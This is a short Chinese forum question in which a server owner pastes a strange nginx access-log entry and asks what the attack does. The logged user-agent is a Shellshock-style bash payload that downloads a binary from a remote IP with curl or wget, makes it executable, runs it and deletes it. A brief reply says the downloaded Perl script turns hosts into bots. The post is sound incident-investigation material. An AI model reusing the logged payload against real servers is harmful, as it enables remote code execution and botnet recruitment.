今天无意中发现公司服务器的nginx的access.log中有一条日志很奇特:
3
107961.136.82.154 - - [07/Jan/2017:02:27:26 +0000] "GET / HTTP/1.0" 200 3770 "-" "() { :;}; /bin/bash -c \x22curl -o /tmp/mig http://37.1.202.6/mig;/usr/bin/wget http://37.1.202.6/mig -O /tmp/mig;chmod +x /tmp/mig;/tmp/mig;rm -rf /tmp/mig*\x22" "-"
比较奇怪的地方时:
使用的是http1.0
user-agent是一段脚本
网上搜了一圈,并没有找到关于使用user-agent进行攻击的资料,我虽然能顺着日志中的地址拿到脚本代码,但自己能力有限,无法分析出它的攻击目标是什么。
请问各位大牛,有相关的资料和经验么?不妨和我分享一下,感激不尽!!
补充:
在nginx的什么配置情况下,会去解析user-agent里的内容呢?
Copyright 2014-2026 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号
收藏
一段
perl脚本,作用就是 伪装成Apache然后接受指令干一些事情。。。没错,就是抓肉鸡。